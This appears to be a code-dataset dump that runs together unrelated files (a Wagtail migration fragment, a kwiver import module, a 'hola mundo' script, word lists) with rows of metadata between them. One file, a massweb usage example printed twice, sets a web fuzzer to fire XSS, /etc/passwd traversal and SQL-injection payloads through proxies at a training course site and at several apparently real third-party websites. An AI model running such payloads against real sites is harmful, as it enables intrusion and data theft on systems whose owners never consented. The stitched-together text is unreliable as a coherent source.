wagtail.core.blocks.ChoiceBlock(
choices=[
("one-half", "One-half"),
("one-third", "One-third"),
]
),
),
(
"size",
wagtail.core.blocks.ChoiceBlock(
choices=[
("", "Default"),
("small", "Small"),
],
required=False,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"promos",
wagtail.core.blocks.ListBlock(
wagtailnhsukfrontend.blocks.BasePromoBlock
),
),
]
),
),
(
"warning_callout_block",
wagtail.core.blocks.StructBlock(
[
(
"title",
wagtail.core.blocks.CharBlock(
default="Important", required=True
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
required=True,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
],
blank=True,
verbose_name="Body blocks",
),
),
],
options={"abstract": False,},
bases=("wagtailcore.page",),
),
]
| 62.545364 | 200 | 0.152328 | 1,679 | 62,733 | 5.601549 | 0.081596 | 0.154386 | 0.233174 | 0.107177 | 0.959277 | 0.959277 | 0.959277 | 0.959277 | 0.959277 | 0.959277 | 0 | 0.01053 | 0.807741 | 62,733 | 1,002 | 201 | 62.607784 | 0.769256 | 0.000717 | 0 | 0.761809 | 1 | 0.01809 | 0.056998 | 0.001276 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.01005 | 0 | 0.01407 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
d676cee102827e0bf7ebc9a3e8c74eab30c6e874 | 167 | py | Python | python/kwiver/vital/algo/__init__.py | mwoehlke-kitware/kwiver | 614a488bd2b7fe551ac75eec979766d882709791 | [
"BSD-3-Clause"
] | 176 | 2015-07-31T23:33:37.000Z | 2022-03-21T23:42:44.000Z | python/kwiver/vital/algo/__init__.py | mwoehlke-kitware/kwiver | 614a488bd2b7fe551ac75eec979766d882709791 | [
"BSD-3-Clause"
] | 1,276 | 2015-05-03T01:21:27.000Z | 2022-03-31T15:32:20.000Z | python/kwiver/vital/algo/__init__.py | mwoehlke-kitware/kwiver | 614a488bd2b7fe551ac75eec979766d882709791 | [
"BSD-3-Clause"
] | 85 | 2015-01-25T05:13:38.000Z | 2022-01-14T14:59:37.000Z | from __future__ import absolute_import
from kwiver.vital.config import Config
from kwiver.vital.algo.algorithm_factory import *
from kwiver.vital.algo.algos import *
| 27.833333 | 49 | 0.838323 | 24 | 167 | 5.583333 | 0.458333 | 0.223881 | 0.335821 | 0.313433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101796 | 167 | 5 | 50 | 33.4 | 0.893333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
d6979a89733b3423871a2768ff2089480033b52e | 111 | py | Python | holamundo.py | dgallards/multimedia | 7b6ed445b49381aa3a75b97db48d6bc4fc00f83a | [
"Apache-2.0"
] | null | null | null | holamundo.py | dgallards/multimedia | 7b6ed445b49381aa3a75b97db48d6bc4fc00f83a | [
"Apache-2.0"
] | 1 | 2022-02-24T10:30:18.000Z | 2022-02-24T10:30:18.000Z | holamundo.py | dgallards/multimedia | 7b6ed445b49381aa3a75b97db48d6bc4fc00f83a | [
"Apache-2.0"
] | null | null | null | def holamundo():
print("hola")
def holamundo():
print("hola a todos")
def holamundo():
print("hola gente")
| 13.875 | 22 | 0.666667 | 15 | 111 | 4.933333 | 0.466667 | 0.486486 | 0.689189 | 0.851351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144144 | 111 | 7 | 23 | 15.857143 | 0.778947 | 0 | 0 | 0.5 | 0 | 0 | 0.236364 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
d69ee7ffd35dc62344533a89853083ca35f5f293 | 3,637 | py | Python | test/docs/wiki_usage_test_4.py | acaceres2176/massweb | 153d1e00ee293f467e88e7f5ce98617a5c13cfb7 | [
"Apache-2.0"
] | null | null | null | test/docs/wiki_usage_test_4.py | acaceres2176/massweb | 153d1e00ee293f467e88e7f5ce98617a5c13cfb7 | [
"Apache-2.0"
] | null | null | null | test/docs/wiki_usage_test_4.py | acaceres2176/massweb | 153d1e00ee293f467e88e7f5ce98617a5c13cfb7 | [
"Apache-2.0"
] | null | null | null | """
from massweb.fuzzers.web_fuzzer import WebFuzzer
from massweb.payloads.payload import Payload
proxies = [{"http": "user:password@http://proxy.example.com:1234/some/path"}, {"http": "otheruser:otherpassword@http://proxy2.example.net:6789/some/path"}]
xss_payload = Payload('"><ScRipT>alert(31337)</ScrIpT>', check_type_list = ["xss"])
trav_payload = Payload('../../../../../../../../../../../../../../../../../../etc/passwd', check_type_list=["trav"])
sqli_xpathi_payload = Payload("')--", check_type_list=["sqli", "xpathi"])
wf = WebFuzzer(num_threads=30, time_per_url=5, proxy_list=proxies)
wf.add_payload(xss_payload)
wf.add_payload(trav_payload)
wf.add_payload(sqli_xpathi_payload)
wf.add_target_from_url(u"http://course.hyperiongray.com/vuln1")
wf.add_target_from_url(u"http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/")
wf.add_target_from_url(u"http://www.wpsurfing.co.za/?feed=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E")
wf.add_target_from_url(u"http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&amp;ProName=1")
wf.add_target_from_url(u"http://www.gayoutdoors.com/page.cfm?snippetset=yes&amp;typeofsite=snippetdetail&amp;ID=1368&amp;Sectionid=1")
wf.add_target_from_url(u"http://www.dobrevsource.org/index.php?id=1")
print "Targets list pre post determination:"
for target in wf.targets:
print target
print "Targets list after additional injection points have been found:"
wf.determine_posts_from_targets()
for target in wf.targets:
print target.url, target.data
print "FuzzyTargets list:"
wf.generate_fuzzy_targets()
for ft in wf.fuzzy_targets:
print ft, ft.ttype, ft.data
print "Results of our fuzzing:"
for r in wf.fuzz():
print r, r.fuzzy_target.ttype, r.fuzzy_target.payload
"""
from massweb.fuzzers.web_fuzzer import WebFuzzer
from massweb.payloads.payload import Payload
proxies = [{"http": "user:password@http://proxy.example.com:1234/some/path"}, {"http": "otheruser:otherpassword@http://proxy2.example.net:6789/some/path"}]
xss_payload = Payload('"><ScRipT>alert(31337)</ScrIpT>', check_type_list = ["xss"])
trav_payload = Payload('../../../../../../../../../../../../../../../../../../etc/passwd', check_type_list=["trav"])
sqli_xpathi_payload = Payload("')--", check_type_list=["sqli", "xpathi"])
wf = WebFuzzer(num_threads=30, time_per_url=5, proxy_list=proxies)
wf.add_payload(xss_payload)
wf.add_payload(trav_payload)
wf.add_payload(sqli_xpathi_payload)
wf.add_target_from_url(u"http://course.hyperiongray.com/vuln1")
wf.add_target_from_url(u"http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/")
wf.add_target_from_url(u"http://www.wpsurfing.co.za/?feed=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E")
wf.add_target_from_url(u"http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&amp;ProName=1")
wf.add_target_from_url(u"http://www.gayoutdoors.com/page.cfm?snippetset=yes&amp;typeofsite=snippetdetail&amp;ID=1368&amp;Sectionid=1")
wf.add_target_from_url(u"http://www.dobrevsource.org/index.php?id=1")
print "Targets list pre post determination:"
for target in wf.targets:
print target
print "Targets list after additional injection points have been found:"
wf.determine_posts_from_targets()
for target in wf.targets:
print target.url, target.data
print "FuzzyTargets list:"
wf.generate_fuzzy_targets()
for ft in wf.fuzzy_targets:
print ft, ft.ttype, ft.data
print "Results of our fuzzing:"
for r in wf.fuzz():
print r, r.fuzzy_target.ttype, r.fuzzy_target.payload
| 45.4625 | 159 | 0.726973 | 542 | 3,637 | 4.701107 | 0.210332 | 0.035322 | 0.051805 | 0.070644 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0.039755 | 0.100907 | 3,637 | 79 | 160 | 46.037975 | 0.73945 | 0 | 0 | 0.066667 | 0 | 0.1 | 0.452991 | 0.054131 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.066667 | 0.066667 | null | null | 0.266667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
d6b8e145b57f2f06c42d63214e5cf96dce132114 | 18,634 | py | Python | stable_world/interact/bucket_configs/words.py | StableWorld/stable.world | 08759ced5eb56c5f8d8e60dd27a81b420015a740 | [
"BSD-2-Clause"
] | null | null | null | stable_world/interact/bucket_configs/words.py | StableWorld/stable.world | 08759ced5eb56c5f8d8e60dd27a81b420015a740 | [
"BSD-2-Clause"
] | 1 | 2018-08-11T02:32:55.000Z | 2018-08-11T02:32:55.000Z | stable_world/interact/bucket_configs/words.py | StableWorld/stable.world | 08759ced5eb56c5f8d8e60dd27a81b420015a740 | [
"BSD-2-Clause"
] | null | null | null | # flake8: noqa
adjectives = ['average', 'big', 'colossal', 'fat', 'giant', 'gigantic', 'great', 'huge', 'immense', 'large', 'little', 'long', 'mammoth', 'massive', 'miniature', 'petite', 'puny', 'short', 'small', 'tall', 'tiny', 'boiling', 'breezy', 'broken', 'bumpy', 'chilly', 'cold', 'cool', 'creepy', 'crooked', 'cuddly', 'curly', 'damaged', 'damp', 'dirty', 'dry', 'dusty', 'filthy', 'flaky', 'fluffy', 'wet', 'broad', 'chubby', 'crooked', 'curved', 'deep', 'flat', 'high', 'hollow', 'low', 'narrow', 'round', 'shallow', 'skinny', 'square', 'steep', 'straight', 'wide', 'ancient', 'brief', 'early', 'fast', 'late', 'long', 'modern', 'old', 'old-fashioned', 'quick', 'rapid', 'short', 'slow', 'swift', 'young', 'abundant', 'empty', 'few', 'heavy', 'light', 'many', 'numerous', 'Sound', 'cooing', 'deafening', 'faint', 'harsh', 'high-pitched', 'hissing', 'hushed', 'husky', 'loud', 'melodic', 'moaning', 'mute', 'noisy', 'purring', 'quiet', 'raspy', 'resonant', 'screeching', 'shrill', 'silent', 'soft', 'squealing', 'thundering', 'voiceless', 'whispering', 'bitter', 'delicious', 'fresh', 'juicy', 'ripe', 'rotten', 'salty', 'sour', 'spicy', 'stale', 'sticky', 'strong', 'sweet', 'tasteless', 'tasty', 'thirsty', 'fluttering', 'fuzzy', 'greasy', 'grubby', 'hard', 'hot', 'icy', 'loose', 'melted', 'plastic', 'prickly', 'rainy', 'rough', 'scattered', 'shaggy', 'shaky', 'sharp', 'shivering', 'silky', 'slimy', 'slippery', 'smooth', 'soft', 'solid', 'steady', 'sticky', 'tender', 'tight', 'uneven', 'weak', 'wet', 'wooden', 'afraid', 'angry', 'annoyed', 'anxious', 'arrogant', 'ashamed', 'awful', 'bad', 'bewildered', 'bored', 'combative', 'condemned', 'confused', 'creepy', 'cruel', 'dangerous', 'defeated', 'defiant', 'depressed', 'disgusted', 'disturbed', 'eerie', 'embarrassed', 'envious', 'evil', 'fierce', 'foolish', 'frantic', 'frightened', 'grieving', 'helpless', 'homeless', 'hungry', 'hurt', 'ill', 'jealous', 'lonely', 'mysterious', 'naughty', 'nervous', 'obnoxious', 'outrageous', 'panicky', 'repulsive', 'scary', 'scornful', 'selfish', 'sore', 'tense', 'terrible', 'thoughtless', 'tired', 'troubled', 'upset', 'uptight', 'weary', 'wicked', 'worried', 'agreeable', 'amused', 'brave', 'calm', 'charming', 'cheerful', 'comfortable', 'cooperative', 'courageous', 'delightful', 'determined', 'eager', 'elated', 'enchanting', 'encouraging', 'energetic', 'enthusiastic', 'excited', 'exuberant', 'fair', 'faithful', 'fantastic', 'fine', 'friendly', 'funny', 'gentle', 'glorious', 'good', 'happy', 'healthy', 'helpful', 'hilarious', 'jolly', 'joyous', 'kind', 'lively', 'lovely', 'lucky', 'obedient', 'perfect', 'pleasant', 'proud', 'relieved', 'silly', 'smiling', 'splendid', 'successful', 'thoughtful', 'victorious', 'vivacious', 'witty', 'wonderful', 'zealous', 'zany', 'other', 'good', 'new', 'old', 'great', 'high', 'small', 'different', 'large', 'local', 'social', 'important', 'long', 'young', 'national', 'british', 'right', 'early', 'possible', 'big', 'little', 'political', 'able', 'late', 'general', 'full', 'far', 'low', 'public', 'available', 'bad', 'main', 'sure', 'clear', 'major', 'economic', 'only', 'likely', 'real', 'black', 'particular', 'international', 'special', 'difficult', 'certain', 'open', 'whole', 'white', 'free', 'short', 'easy', 'strong', 'european', 'central', 'similar', 'human', 'common', 'necessary', 'single', 'personal', 'hard', 'private', 'poor', 'financial', 'wide', 'foreign', 'simple', 'recent', 'concerned', 'american', 'various', 'close', 'fine', 'english', 'wrong', 'present', 'royal', 'natural', 'individual', 'nice', 'french', 'following', 'current', 'modern', 'labour', 'legal', 'happy', 'final', 'red', 'normal', 'serious', 'previous', 'total', 'prime', 'significant', 'industrial', 'sorry', 'dead', 'specific', 'appropriate', 'top', 'soviet', 'basic', 'military', 'original', 'successful', 'aware', 'hon', 'popular', 'heavy', 'professional', 'direct', 'dark', 'cold', 'ready', 'green', 'useful', 'effective', 'western', 'traditional', 'scottish', 'german', 'independent', 'deep', 'interesting', 'considerable', 'involved', 'physical', 'left', 'hot', 'existing', 'responsible', 'complete', 'medical', 'blue', 'extra', 'past', 'male', 'interested', 'fair', 'essential', 'beautiful', 'civil', 'primary', 'obvious', 'future', 'environmental', 'positive', 'senior', 'nuclear', 'annual', 'relevant', 'huge', 'rich', 'commercial', 'safe', 'regional', 'practical', 'official', 'separate', 'key', 'chief', 'regular', 'due', 'additional', 'active', 'powerful', 'complex', 'standard', 'impossible', 'light', 'warm', 'middle', 'fresh', 'sexual', 'front', 'domestic', 'actual', 'united', 'technical', 'ordinary', 'cheap', 'strange', 'internal', 'excellent', 'quiet', 'soft', 'potential', 'northern', 'religious', 'quick', 'very', 'famous', 'cultural', 'proper', 'broad', 'joint', 'formal', 'limited', 'conservative', 'lovely', 'usual', 'ltd', 'unable', 'rural', 'initial', 'substantial', 'christian', 'bright', 'average', 'leading', 'reasonable', 'immediate', 'suitable', 'equal', 'detailed', 'working', 'overall', 'female', 'afraid', 'democratic', 'growing', 'sufficient', 'scientific', 'eastern', 'correct', 'inc', 'irish', 'expensive', 'educational', 'mental', 'dangerous', 'critical', 'increased', 'familiar', 'unlikely', 'double', 'perfect', 'slow', 'tiny', 'dry', 'historical', 'thin', 'daily', 'southern', 'increasing', 'wild', 'alone', 'urban', 'empty', 'married', 'narrow', 'liberal', 'supposed', 'upper', 'apparent', 'tall', 'busy', 'bloody', 'prepared', 'russian', 'moral', 'careful', 'clean', 'attractive', 'japanese', 'vital', 'thick', 'alternative', 'fast', 'ancient', 'elderly', 'rare', 'external', 'capable', 'brief', 'wonderful', 'grand', 'typical', 'entire', 'grey', 'constant', 'vast', 'surprised', 'ideal', 'terrible', 'academic', 'funny', 'minor', 'pleased', 'severe', 'ill', 'corporate', 'negative', 'permanent', 'weak', 'brown', 'fundamental', 'odd', 'crucial', 'inner', 'used', 'criminal', 'contemporary', 'sharp', 'sick', 'near', 'roman', 'massive', 'unique', 'secondary', 'parliamentary', 'african', 'unknown', 'subsequent', 'angry', 'alive', 'guilty', 'lucky', 'enormous', 'well', 'communist', 'yellow', 'unusual', 'net', 'long-term', 'tough', 'dear', 'extensive', 'glad', 'remaining', 'agricultural', 'alright', 'healthy', 'italian', 'principal', 'tired', 'efficient', 'comfortable', 'chinese', 'relative', 'friendly', 'conventional', 'willing', 'sudden', 'proposed', 'voluntary', 'slight', 'valuable', 'dramatic', 'golden', 'temporary', 'federal', 'keen', 'flat', 'silent', 'indian', 'video-taped', 'worried', 'pale', 'statutory', 'welsh', 'dependent', 'firm', 'wet', 'competitive', 'armed', 'radical', 'outside', 'acceptable', 'sensitive', 'living', 'pure', 'global', 'emotional', 'sad', 'secret', 'rapid', 'adequate', 'fixed', 'sweet', 'administrative', 'wooden', 'remarkable', 'comprehensive', 'surprising', 'solid', 'rough', 'mere', 'mass', 'brilliant', 'maximum', 'absolute', 'tory', 'electronic', 'visual', 'electric', 'cool', 'spanish', 'literary', 'continuing', 'supreme', 'chemical', 'genuine', 'exciting', 'written', 'stupid', 'advanced', 'extreme', 'classical', 'fit', 'favourite', 'socialist', 'widespread', 'confident', 'straight', 'catholic', 'proud', 'numerous', 'opposite', 'distinct', 'mad', 'helpful', 'given', 'disabled', 'consistent', 'anxious', 'nervous', 'awful', 'stable', 'constitutional', 'satisfied', 'conscious', 'developing', 'strategic', 'holy', 'smooth', 'dominant', 'remote', 'theoretical', 'outstanding', 'pink', 'pretty', 'clinical', 'minimum', 'honest', 'impressive', 'related', 'residential', 'extraordinary', 'plain', 'visible', 'accurate', 'distant', 'still', 'greek', 'complicated', 'musical', 'precise', 'gentle', 'broken', 'live', 'silly', 'fat', 'tight', 'monetary', 'round', 'psychological', 'violent', 'unemployed', 'inevitable', 'junior', 'sensible', 'grateful', 'pleasant', 'dirty', 'structural', 'welcome', 'so-called', 'deaf']
nouns = ['richard', 'decryption', 'bangladesh', 'pony', 'futon', 'karate', 'oboe', 'fireplace', 'cribbage', 'vise', 'shack', 'rat', 'cellar', 'interloper', 'rediscovery', 'magician', 'bonnet', 'session', 'policeman', 'jackal', 'ashtray', 'form', 'discount', 'manservant', 'damage', 'bijou', 'bassinet', 'blouse', 'brome', 'tough-guy', 'space', 'beauty', 'arrow', 'yurt', 'responsibility', 'draw', 'edge', 'link', 'elephant', 'visor', 'crew', 'commercial', 'train', 'football', 'regret', 'bend', 'fatigues', 'december', 'till', 'chinese', 'vane', 'forgery', 'stocking', 'deformation', 'mint', 'geriatrician', 'recess', 'recommendation', 'definition', 'iraq', 'barometer', 'partner', 'king', 'person', 'accident', 'care', 'dragon', 'cowbell', 'strawberry', 'rethinking', 'attenuation', 'birdcage', 'review', 'winter', 'sabre', 'evidence', 'eggplant', 'ease', 'typhoon', 'arch-rival', 'floozie', 'frazzle', 'feature', 'lady', 'disgust', 'blade', 'gauge', 'diadem', 'octet', 'earmuffs', 'caption', 'ecumenist', 'second', 'mantua', 'coal', 'satisfaction', 'microlending', 'honoree', 'hospice', 'shallot', 'landform', 'pantsuit', 'north', 'drawing', 'manx', 'ear', 'analog', 'usher', 'tummy', 'theism', 'tangerine', 'bondsman', 'mantle', 'soil', 'composer', 'spectacle', 'bugle', 'pamphlet', 'apron', 'screw', 'sloth', 'sector', 'empowerment', 'sympathy', 'puffin', 'hops', 'effective', 'breakpoint', 'foot', 'summer', 'grey', 'cymbals', 'chastity', 'cotton', 'cash', 'cob', 'movie', 'yam', 'lighting', 'extreme', 'committee', 'zinc', 'bangle', 'original', 'inventory', 'health', 'crook', 'menu', 'phrase', 'catamaran', 'arm', 'godmother', 'scrip', 'compulsion', 'mark', 'use', 'trailer', 'nondisclosure', 'future', 'cashier', 'shovel', 'comradeship', 'airfare', 'gram', 'batter', 'tablecloth', 'bowling', 'fiddle', 'junker', 'tandem', 'chivalry', 'shopper', 'body', 'engineering', 'cousin', 'classroom', 'quiver', 'sky', 'canvas', 'tram', 'alcove', 'jewel', 'criteria', 'menorah', 'minister', 'pelt', 'polish', 'rub', 'sugar', 'capricorn', 'croissant', 'pitch', 'adapter', 'collision', 'michael', 'cloud', 'alibi', 'casino', 'sponge', 'octagon', 'rate', 'jury', 'dictaphone', 'pin', 'bongo', 'fundraising', 'august', 'playground', 'year', 'armor', 'sell', 'initial', 'peony', 'meal', 'plywood', 'retina', 'balloon', 'mechanic', 'rocker', 'tenement', 'block', 'temperature', 'hexagon', 'deer', 'babe', 'angora', 'hive', 'lead', 'purple', 'tear', 'gem', 'fur', 'crystallography', 'apparatus', 'oxford', 'pink', 'pudding', 'resource', 'industry', 'lever', 'mukluk', 'demand', 'almanac', 'paperback', 'wool', 'number', 'pilgrimage', 'production', 'liner', 'pasta', 'enquiry', 'activity', 'moustache', 'change', 'marxism', 'cherries', 'coonskin', 'crash', 'language', 'mousse', 'libra', 'outrigger', 'impress', 'sonnet', 'sweets', 'slider', 'aluminum', 'pvc', 'cappelletti', 'bracket', 'custard', 'tree', 'mistake', 'education', 'altitude', 'legume', 'shoulder', 'cocoa', 'bather', 'desert', 'perspective', 'interviewer', 'violet', 'calculation', 'underground', 'bunghole', 'character', 'shock', 'charge', 'material', 'atm', 'bass', 'tepee', 'patrol', 'cultivator', 'oldie', 'motorboat', 'hot', 'netbook', 'knuckle', 'september', 'cup', 'carnation', 'beyond', 'bag', 'porter', 'crib', 'great-grandmother', 'beach', 'heartwood', 'address', 'attraction', 'conference', 'oval', 'pancake', 'poland', 'backpack', 'alloy', 'contrary', 'bird', 'rectangle', 'pail', 'acoustic', 'dentist', 'downgrade', 'prelude', 'canteen', 'tomato', 'trapdoor', 'sleep', 'low', 'airmail', 'moth', 'consul', 'conversation', 'passion', 'eyeliner', 'carbon', 'ottoman', 'inspection', 'lizard', 'recruit', 'fly', 'well', 'command', 'party', 'goodbye', 'drama', 'mouser', 'moment', 'tutu', 'luttuce', 'pocket', 'volcano', 'bagpipes', 'bacon', 'clerk', 'pine', 'peach', 'water', 'cupboard', 'choice', 'television', 'sunday', 'sale', 'fratricide', 'sustainment', 'title', 'cement', 'publisher', 'editorial', 'cupola', 'elbow', 'nerve', 'vanity', 'knight', 'whorl', 'soda', 'malaysia', 'control', 'format', 'tank-top', 'trolley', 'funeral', 'former', 'diploma', 'pseudoscience', 'cesspool', 'net', 'marketing', 'umbrella', 'policy', 'cauliflower', 'offence', 'apple', 'find', 'netball', 'councilor', 'lion', 'onion', 'overclocking', 'chive', 'tanker', 'scarecrow', 'laborer', 'escape', 'savior', 'mezzanine', 'freight', 'music', 'shoestring', 'artificer', 'blackboard', 'riddle', 'pinto', 'monastery', 'west', 'hurry', 'fruit', 'ink', 'slash', 'hydrant', 'frost', 'noise', 'unblinking', 'replace', 'spacing', 'weasel', 'in-laws', 'friday', 'ride', 'trick', 'alpenhorn', 'sage', 'tabby', 'guitar', 'forestry', 'agreement', 'peak', 'pocket-watch', 'cameo', 'pen', 'gosling', 'save', 'grassland', 'packet', 'dog', 'sarah', 'kneejerk', 'possibility', 'maybe', 'cherry', 'misplacement', 'caravan', 'shred', 'bake', 'meaning', 'roller', 'problem', 'reception', 'pressurisation', 'design', 'chocolate', 'destiny', 'mailbox', 'cot', 'disease', 'toque', 'swimming', 'conspirator', 'corduroy', 'sleuth', 'potential', 'dark', 'pearl', 'gearshift', 'laparoscope', 'goal', 'cent', 'panda', 'bar', 'john', 'cottage', 'squid', 'curtain', 'vegetable', 'rope', 'insurgence', 'garment', 'submarine', 'butter', 'constellation', 'slippers', 'view', 'humidity', 'freighter', 'explanation', 'abolishment', 'difficulty', 'sun', 'dashboard', 'foot-rest', 'clasp', 'apartment', 'dugout', 'leg', 'college', 'heavy', 'work', 'litigation', 'raincoat', 'locket', 'procedure', 'seat', 'necklace', 'thigh', 'canoe', 'inlay', 'chess', 'father-in-law', 'effacement', 'basis', 'anklet', 'self', 'call', 'finance', 'dedication', 'spy', 'congressman', 'refrigerator', 'wrinkle', 'mist', 'understanding', 'depression', 'celebration', 'hyena', 'waterfall', 'eyelid', 'variety', 'crowd', 'emery', 'bungalow', 'espadrille', 'fishbone', 'philosophy', 'revolve', 'sycamore', 'toenail', 'harbor', 'bonsai', 'sweater', 'act', 'master', 'checkroom', 'beginner', 'recording', 'helen', 'portfolio', 'earthquake', 'click', 'gold', 'river', 'spume', 'lung', 'underneath', 'dogsled', 'historian', 'shoehorn', 'metronome', 'shoemaker', 'grain', 'cravat', 'sort', 'bottom', 'shofar', 'chandelier', 'output', 'lettuce', 'lily', 'currency', 'club', 'case', 'hat', 'vineyard', 'astrolabe', 'pad', 'transportation', 'sudan', 'hurricane', 'tulip', 'waterskiing', 'skylight', 'fawn', 'surgeon', 'venezuela', 'thongs', 'accelerator', 'venezuelan', 'eponym', 'geology', 'ridge', 'increase', 'cuff-links', 'wampum', 'vinyl', 'swan', 'spinach', 'interior', 'government', 'shop', 'sourwood', 'marriage', 'story-telling', 'tam', 'shoes', 'greece', 'pith', 'lapdog', 'creche', 'garter', 'revenue', 'sweats', 'need', 'juggernaut', 'midi', 'platinum', 'environment', 'assumption', 'authority', 'delete', 'actress', 'zebrafish', 'elk', 'south', 'vision', 'clover', 'wish', 'weekend', 'expression', 'rubber', 'maraca', 'plain', 'bengal', 'linen', 'video', 'finger', 'orchid', 'underclothes', 'pouch', 'energy', 'eyestrain', 'worklife', 'ordination', 'bunch', 'wednesday', 'watch', 'loggia', 'anger', 'chairperson', 'recorder', 'dealer', 'catacomb', 'alpha', 'pressroom', 'lumber', 'barstool', 'fiber', 'server', 'occupation', 'crocodile', 'cascade', 'flugelhorn', 'motel', 'chest', 'junk', 'wrong', 'mice', 'pansy', 'music-box', 'authorisation', 'thaw', 'clavicle', 'teaching', 'hip', 'gate', 'order', 'curl', 'hedgehog', 'sack', 'roadway', 'job', 'campanile', 'baby', 'refectory', 'candy', 'laura', 'sprinter', 'tremor', 'owl', 'ladder', 'galley', 'gladiolus', 'line', 'schooner', 'frown', 'fencing', 'wealth', 'client', 'ad', 'employ', 'marksman', 'toast', 'cornet', 'hall', 'chop', 'latency', 'councilman', 'opportunity', 'pneumonia', 'english', 'british', 'deployment', 'son', 'oeuvre', 'bootee', 'oyster', 'bowl', 'index', 'box', 'dirt', 'insulation', 'cloakroom', 'oncology', 'shoe-horn', 'clarinet', 'radish', 'fedelini', 'pusher', 'law', 'balcony', 'clogs', 'sled', 'corn', 'hand-holding', 'motion', 'korea', 'elixir', 'sturgeon', 'coinsurance', 'xylophone', 'handmaiden', 'big-rig', 'weird', 'settler', 'bite', 'russia', 'math', 'hostel', 'culvert', 'project', 'hope', 'banjo', 'frock', 'hygienic', 'miscarriage', 'mary', 'verve', 'debt', 'lounge', 'soybean', 'table', 'steak', 'building', 'titanium', 'caution', 'sock', 'route', 'sepal', 'solution', 'shadow', 'kind', 'e-book', 'step-brother', 'leprosy', 'squatter', 'interest', 'yak', 'larch', 'skulduggery', 'tom-tom', 'sheath', 'harpooner', 'linseed', 'astrology', 'nurse', 'tale', 'purse', 'router', 'kazoo', 'brain', 'wallet', 'lunch', 'speaker', 'geyser', 'tambour', 'skate', 'young', 'windshield', 'yarn', 'uzbekistan', 'snowmobiling', 'caddy', 'macrame', 'theater', 'turban', 'babies', 'anything', 'guilty', 'best-seller', 'america', 'bandanna', 'novel', 'crab', 'level', 'spray', 'knife-edge', 'kettledrum', 'billboard', 'thing', 'meet', 'poof', 'pimp', 'monster', 'redesign', 'scissors', 'homogenate', 'morning', 'pain', 'leo', 'feet', 'light', 'quantity', 'big', 'railway', 'mantel', 'starter', 'cyst', 'vibe', 'hood', 'demur', 'pharmacopoeia', 'tub', 'obi', 'sewer', 'rhinoceros', 'toothpick', 'ability', 'sledge', 'technician', 'gun', 'couch', 'complaint', 'ironclad', 'income', 'stamp', 'factory', 'hobby', 'anatomy', 'booty', 'event', 'margaret', 'colon', 'red', 'volume', 'psychoanalyst', 'asterisk', 'footnote', 'dilapidation', 'eyelids', 'massage', 'salesman', 'opera', 'pew', 'brandy', 'loincloth', 'fringe', 'gear', 'algebra', 'aries', 'cupcake', 'good-bye', 'wastebasket', 'mixer', 'kick', 'twine', 'spike', 'grease', 'bower', 'particular', 'tuesday', 'whale', 'achiever', 'buy', 'ring', 'noodle', 'sprout', 'wet-bar', 'tiara', 'piss', 'attachment', 'oil', 'council', 'minor', 'fertilizer', 'style', 'guide', 'candidate', 'danger', 'aquifer', 'phone', 'sunglasses', 'foray', 'towel', 'cheque', 'hamburger', 'hotel', 'men', 'blizzard', 'notebook', 'reflection', 'text', 'dromedary', 'jacket', 'bandolier', 'trapezium', 'cathedral', 'figurine', 'pencil', 'thought', 'thursday', 'thunderbolt', 'buyer', 'web', 'cost', 'confusion', 'diving', 'azimuth', 'primate', 'island', 'coil', 'turn', 'cicada', 'locomotive', 'nicety', 'flight', 'hill', 'exposition', 'keyboard', 'pedestrian', 'innervation', 'blueberry', 'plastic', 'range', 'reality', 'achieve', 'hearthside', 'representative', 'trim', 'digestion', 'feedback', 'pier', 'breastplate', 'structure', 'atrium', 'doubt', 'fusarium', 'hour', 'fortune', 'netsuke', 'clank', 'lier', 'force', 'belfry', 'hardware', 'suck', 'channel', 'distance', 'weeder', 'claus', 'broker', 'fortnight', 'eel', 'icon', 'shears', 'latex', 'chick', 'method', 'soccer', 'expansion', 'church']
